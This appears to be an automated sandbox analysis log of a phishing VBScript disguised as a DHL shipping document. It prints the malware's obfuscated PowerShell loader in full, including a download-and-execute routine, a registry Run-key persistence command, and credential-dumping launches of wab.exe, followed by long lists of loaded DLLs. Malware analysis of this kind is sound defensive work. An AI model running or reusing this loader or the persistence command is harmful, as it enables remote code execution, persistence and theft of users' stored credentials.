Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 00000013.00000002.2023090570.00000000038AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
